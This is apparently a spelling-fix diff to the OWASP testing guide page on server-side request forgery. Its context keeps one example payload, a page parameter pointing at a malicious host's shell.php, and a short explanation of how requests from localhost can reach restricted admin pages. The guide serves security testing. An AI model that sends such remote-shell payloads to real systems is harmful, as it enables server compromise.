OWASP/wstg/Testing_for_Server-Side_Request_Forgery.md

 page=https://malicioussite.com/shell.php
 ```

 Use the localhost/loopback interface to access content restricted to the host only.
-This mechanism implies that if you have access to the host than you have enought privileges to direclty access the `admin` page.
+This mechanism implies that if you have access to the host than you have enough privileges to directly access the `admin` page.

 These kind of trust relationships, where requests originating from the local machine are handled differently than ordinary requests, is often what makes SSRF into a critical vulnerability.